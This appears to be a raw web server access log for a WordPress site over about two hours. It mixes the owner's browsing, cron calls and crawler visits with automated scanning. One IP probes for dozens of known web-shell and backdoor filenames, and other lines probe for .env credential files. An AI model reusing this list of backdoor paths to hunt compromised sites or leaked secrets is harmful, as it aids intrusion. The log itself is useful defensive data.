14.108.232.209 - - [22/Aug/2025:12:15:06 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:17:07 +0800] "POST /wp-cron.php?doing_wp_cron=1755836227.8908638954162597656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:17:07 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:23:33 +0800] "POST /wp-cron.php?doing_wp_cron=1755836613.5657289028167724609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:23:33 +0800] "GET /2164/ HTTP/1.1" 200 27371 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:23:33 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-150x150.webp HTTP/1.1" 200 5292 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:23:37 +0800] "GET /news/ HTTP/1.1" 200 27202 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:23:37 +0800] "GET /wp-content/uploads/2025/08/1755826456-DSC01841.webp HTTP/1.1" 304 0 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:23:37 +0800] "GET /wp-content/uploads/2025/08/1755826390-DSC01765.webp HTTP/1.1" 304 0 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:23:37 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472.webp HTTP/1.1" 200 31854 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:23:37 +0800] "GET /wp-content/uploads/2025/07/1753453986-Article_images_W900px.webp HTTP/1.1" 200 57364 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:23:58 +0800] "POST /wp-cron.php?doing_wp_cron=1755836638.8157930374145507812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.211 - - [22/Aug/2025:12:23:59 +0800] "GET / HTTP/1.1" 200 39126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [22/Aug/2025:12:32:35 +0800] "POST /wp-cron.php?doing_wp_cron=1755837155.4977190494537353515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
138.201.252.115 - - [22/Aug/2025:12:32:35 +0800] "GET / HTTP/1.0" 301 0 "-" "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)"
36.133.115.36 - - [22/Aug/2025:12:43:39 +0800] "POST /wp-cron.php?doing_wp_cron=1755837819.0532400608062744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [22/Aug/2025:12:43:39 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [22/Aug/2025:13:05:54 +0800] "POST /wp-cron.php?doing_wp_cron=1755839154.8329789638519287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
8.219.153.58 - - [22/Aug/2025:13:06:02 +0800] "GET / HTTP/1.0" 200 109870 "-" "-"
8.219.153.58 - - [22/Aug/2025:13:06:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
36.133.115.36 - - [22/Aug/2025:13:08:25 +0800] "POST /wp-cron.php?doing_wp_cron=1755839305.1910169124603271484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
8.219.153.58 - - [22/Aug/2025:13:08:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
36.133.115.36 - - [22/Aug/2025:13:11:19 +0800] "POST /wp-cron.php?doing_wp_cron=1755839478.9559369087219238281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [22/Aug/2025:13:11:19 +0800] "GET / HTTP/1.1" 200 33393 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.220.168.249 - - [22/Aug/2025:13:22:50 +0800] "GET /wp-includes/ID3/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:50 +0800] "GET /wp-includes/fonts/ HTTP/1.1" 403 146 "-" "-"
36.133.115.36 - - [22/Aug/2025:13:22:51 +0800] "POST /wp-cron.php?doing_wp_cron=1755840171.4760179519653320312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
135.220.168.249 - - [22/Aug/2025:13:22:51 +0800] "GET /wp/wp-admin/includes/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:52 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:52 +0800] "GET /wp-admin/css/colors/modern/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:53 +0800] "GET /wp-admin/js/about.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:53 +0800] "GET /wp-admin/network/ HTTP/1.1" 302 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:54 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fnetwork%2F&reauth=1 HTTP/1.1" 200 8680 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:54 +0800] "GET /wp-includes/customize/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:55 +0800] "GET /WSO.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:55 +0800] "GET /wp-includes/css/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:55 +0800] "GET /templates/beez3/error.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:55 +0800] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:55 +0800] "GET /wp-includes/ID3/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:56 +0800] "GET /wp-includes/css/dist/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:56 +0800] "GET /wp-includes/images/crystal/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:56 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:56 +0800] "GET /wp-admin/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:57 +0800] "GET /wp-includes/ID3/file.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:57 +0800] "GET /wp-includes/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:58 +0800] "GET /admin/uploads/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:58 +0800] "GET /wp-content/cong.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:58 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:58 +0800] "GET /wp-includes/images/media/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:22:59 +0800] "GET /wp-admin/admin.php HTTP/1.1" 302 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:00 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fadmin.php&reauth=1 HTTP/1.1" 200 8681 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:00 +0800] "GET /wp-content/languages/chosen.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:01 +0800] "GET /wp-content/plugins/ HTTP/1.1" 200 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:01 +0800] "GET /wp-content/uploads/2024/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:01 +0800] "GET /goods.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:02 +0800] "GET /plugins/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:02 +0800] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:02 +0800] "GET /wp-content/themes/wp-pridmag/init.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:03 +0800] "GET /cgi-bin/wp-2019.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:03 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2667 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:03 +0800] "GET /wp-content/file.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:04 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:04 +0800] "GET /file5.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:04 +0800] "GET /wp-includes/images/smilies/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:05 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:06 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:06 +0800] "GET /wp-includes/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:06 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:06 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:06 +0800] "GET /wp-includes/blocks/ HTTP/1.1" 200 12 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:07 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:07 +0800] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:08 +0800] "GET /.well-known/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:08 +0800] "GET /modules/file.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:08 +0800] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:09 +0800] "GET /wp-admin/css/colors/sunrise/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:09 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:09 +0800] "GET /public/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:10 +0800] "GET /wp-admin/network/index.php HTTP/1.1" 302 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:11 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fnetwork%2Findex.php&reauth=1 HTTP/1.1" 200 8689 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:12 +0800] "GET /wp-content/uploads/2022/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:12 +0800] "GET /wp-content/uploads/json.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:12 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:12 +0800] "GET /wp-includes/customize/chosen.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:13 +0800] "GET /wp-includes/shell20211028.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:13 +0800] "GET /index/function.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:13 +0800] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:13 +0800] "GET /wp-content/style-css.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:13 +0800] "GET /wp-includes/Requests/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:14 +0800] "GET /wp-includes/pomo/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:14 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:14 +0800] "GET /wp-admin/css/colors/light/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:14 +0800] "GET /wp-includes/certificates/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:15 +0800] "GET /wp-admin/css/colors/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:15 +0800] "GET /wp-admin/css/colors/blue/about.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:15 +0800] "GET /wp-content/alfa.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:15 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:15 +0800] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:16 +0800] "GET /wp-content/about.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:16 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:16 +0800] "GET /admin/controller/extension/extension/ultra.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:16 +0800] "GET /wp-admin/images/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:16 +0800] "GET /wp-includes/block-supports/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:17 +0800] "GET /wp-content/themes/twentytwenty/404.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:17 +0800] "GET /wp-content/upgrade/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:17 +0800] "GET /wp-admin/images/cloud.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:18 +0800] "GET /wp-admin/user/ HTTP/1.1" 302 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:19 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fuser%2F&reauth=1 HTTP/1.1" 200 8677 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:19 +0800] "GET /wp-admin/user/chosen.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:19 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:19 +0800] "GET /wp-includes/file.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:20 +0800] "GET /admin/admin.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:20 +0800] "GET /wp-includes/assets/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:20 +0800] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:20 +0800] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:21 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:21 +0800] "GET /wp-includes/block-patterns/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:22 +0800] "GET /aspera/faspex/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:23 +0800] "GET /cgi-bin/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:23 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:23 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:23 +0800] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:24 +0800] "GET /admin/function.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:24 +0800] "GET /wp-admin/network/chosen.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:24 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:25 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:25 +0800] "GET /wp-includes/assets/admin.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:25 +0800] "GET /wp-includes/images/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:25 +0800] "GET /.well-known/classwithtostring.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:25 +0800] "GET /anonse/lock360.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:26 +0800] "GET /cgi-bin/wp-login.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:26 +0800] "GET /wp-admin/css/colors/ectoplasm/wp-login.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:26 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:27 +0800] "GET /wp-content/uploads/2021/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:27 +0800] "GET /wp-includes/html-api/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:28 +0800] "GET /assets/images/doc.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:28 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:28 +0800] "GET /radio.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:28 +0800] "GET /wp-admin/js/widgets/about.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:29 +0800] "GET /wp-admin/includes/cloud.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:29 +0800] "GET /wp-admin/includes/index.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:29 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:29 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:29 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:30 +0800] "GET /functions.php HTTP/1.1" 404 27 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:31 +0800] "GET /modules/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:31 +0800] "GET /wp-admin/css/colors/ocean/ HTTP/1.1" 403 146 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:32 +0800] "GET /admin/upload/ HTTP/1.1" 404 31381 "-" "-"
135.220.168.249 - - [22/Aug/2025:13:23:32 +0800] "GET /ccx/index.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [22/Aug/2025:13:28:58 +0800] "POST /wp-cron.php?doing_wp_cron=1755840538.4576070308685302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
106.42.164.122 - - [22/Aug/2025:13:28:58 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39125 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
111.29.116.240 - - [22/Aug/2025:13:29:29 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.33"
111.29.116.240 - - [22/Aug/2025:13:29:30 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39125 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.33"
3.130.96.91 - - [22/Aug/2025:13:29:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [22/Aug/2025:13:34:15 +0800] "POST /wp-cron.php?doing_wp_cron=1755840855.1748640537261962890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
132.232.203.74 - - [22/Aug/2025:13:34:15 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Aug/2025:13:37:37 +0800] "POST /wp-cron.php?doing_wp_cron=1755841057.8573460578918457031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.14 - - [22/Aug/2025:13:37:38 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Aug/2025:13:59:05 +0800] "POST /wp-cron.php?doing_wp_cron=1755842345.1086390018463134765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.121 - - [22/Aug/2025:13:59:05 +0800] "HEAD /.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)"
36.133.115.36 - - [22/Aug/2025:14:01:38 +0800] "POST /wp-cron.php?doing_wp_cron=1755842498.1668579578399658203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.159.144.16 - - [22/Aug/2025:14:01:38 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Aug/2025:14:10:43 +0800] "POST /wp-cron.php?doing_wp_cron=1755843043.2141649723052978515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.164.195.17 - - [22/Aug/2025:14:10:43 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Aug/2025:14:19:37 +0800] "POST /wp-cron.php?doing_wp_cron=1755843577.9202001094818115234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [22/Aug/2025:14:19:38 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.90.185.47 - - [22/Aug/2025:14:19:40 +0800] "GET /.env.local HTTP/1.1" 404 8988 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [22/Aug/2025:14:24:15 +0800] "POST /wp-cron.php?doing_wp_cron=1755843855.4942100048065185546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:14:24:15 +0800] "GET /2215/ HTTP/1.1" 200 27839 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:14:24:15 +0800] "GET /wp-content/uploads/2025/08/1755826456-DSC01841.webp HTTP/1.1" 304 0 "http://cqqizhou.com/2215/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:14:24:15 +0800] "GET /wp-content/uploads/2025/08/1755826390-DSC01765-150x150.webp HTTP/1.1" 304 0 "http://cqqizhou.com/2215/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:14:24:15 +0800] "GET /wp-content/uploads/2025/07/1753453719-Article_images1_W900px.webp HTTP/1.1" 200 78234 "http://cqqizhou.com/2215/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:14:27:51 +0800] "POST /wp-cron.php?doing_wp_cron=1755844071.5270750522613525390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:14:27:51 +0800] "GET / HTTP/1.1" 200 41523 "http://cqqizhou.com/2215/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
